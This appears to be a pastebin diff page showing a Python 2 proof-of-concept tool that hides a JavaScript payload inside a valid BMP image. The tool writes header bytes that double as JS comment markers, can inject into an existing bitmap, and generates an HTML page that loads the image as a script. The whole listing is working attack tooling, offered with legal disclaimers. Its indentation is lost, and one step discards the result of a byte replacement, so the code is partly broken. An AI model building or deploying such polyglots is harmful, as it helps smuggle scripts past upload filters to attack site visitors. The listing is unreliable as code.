View difference between Paste ID: <a href="/MURBYw67">MURBYw67</a> and <a href="/04y7ee3u">04y7ee3u</a>

#!/usr/bin/env python2
1		#!/usr/bin/env python2
2		#============================================================================================================#
3		#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
4		#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
5		#======= Author: marcoramilli.blogspot.com ==================================================================#
6		#======= Version: PoC (don't even think to use it in development env.) ======================================#
7		#======= Disclaimer: ========================================================================================#
8		#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
9		#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
10		#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
11		#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
12		#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
13		#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
14		#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
15		#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
16		#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
17		#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
18		#POSSIBILITY OF SUCH DAMAGE.
19		#===========================================================================================================#
20		import argparse
21		import os
22
23		#---------------------------------------------------------
24		def _hexify(num):
25		"""
26		Converts and formats to hexadecimal
27		"""
28		num = "%x" % num
29		if len(num) % 2:
30		num = '0'+num
31		return num.decode('hex')
32
33		#---------------------------------------------------------
34		#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
35		#;alert(_0xe428[0]);"
36		def _generate_and_write_to_file(payload, fname):
37		"""
38		Generates a fake but valid BMP within scriting
39		"""
40		f = open(fname, "wb")
41		header = (b'\x42\x4D' #Signature BM
42		b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
43		b'\x00\x00\x00\x00' #Reserved
44		b'\x00\x00\x00\x00' #bitmap data offset
45		b''+ _hexify( len(payload) ) + #bitmap header size
46		b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
47		b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
48		b'\x00\x00' #nb_plan
49		b'\x00\x00' #nb per pixel
50		b'\x00\x10\x00\x00' #compression type
51		b'\x00\x00\x00\x00' #image size .. its ignored
52		b'\x00\x00\x00\x01' #Horizontal resolution
53		b'\x00\x00\x00\x01' #Vertial resolution
54		b'\x00\x00\x00\x00' #number of colors
55		b'\x00\x00\x00\x00' #number important colors
56		b'\x00\x00\x00\x80' #palet colors to be complient
57		b'\x00\x80\xff\x80' #palet colors to be complient
58		b'\x80\x00\xff\x2A' #palet colors to be complient
59		b'\x2F\x3D\x31\x3B' #*/=1;
60		)
61		# I made this explicit, step by step .
62		f.write(header)
63		f.write(payload)
64		f.close()
65		return True
66
67		#---------------------------------------------------------
68		def _generate_launching_page(f):
69		"""
70		Creates the HTML launching page
71		"""
72
73		htmlpage ="""
74		<html>
75		<head><title>Opening an image</title> </head>
76		<body>
77		<img src=\"""" + f + """\"\>
78		<script src= \"""" + f + """\"> </script>
79		</body>
80		</html>
81		"""
82		html = open("run.html", "wb")
83		html.write(htmlpage);
84		html.close()
85		return True
86
87		#---------------------------------------------------------
88		def _inject_into_file(payload, fname):
89		"""
90		Injects the payload into existing BMP
91		NOTE: if the BMP contains \xFF\x2A might caouse issues
92		"""
93		# I know, I can do it all in memory and much more fast.
94		# I wont do it here.
95		f = open(fname, "r+b")
96		b = f.read()
97		b.replace(b'\x2A\x2F',b'\x00\x00')
98		f.close()
99
100		f = open(fname, "w+b")
101		f.write(b)
102		f.seek(2,0)
103		f.write(b'\x2F\x2A')
104		f.close()
105
106		f = open(fname, "a+b")
107		f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
108		f.write(payload)
109		f.close()
110		return True
111
112
113		#---------------------------------------------------------
114		if __name__ == "__main__":
115		parser = argparse.ArgumentParser()
116		parser.add_argument("filename",help="the bmp file name to be generated/or infected")
117		parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
118		parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
119		args = parser.parse_args()
120		print("""
121		\|======================================================================================================\|
122		\| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. \|
123		\| It is the end user's responsibility to obey all applicable local, state and federal laws. \|
124		\| Authors assume no liability and are not responsible for any misuse or damage caused by this program \|
125		\|======================================================================================================\|
126		""")
127		if args.inject_to_existing_bmp:
128		_inject_into_file(args.js_payload, args.filename)
129		else:
130		_generate_and_write_to_file(args.js_payload, args.filename)
131
132		_generate_launching_page(args.filename)
133		print "[+] Finished!"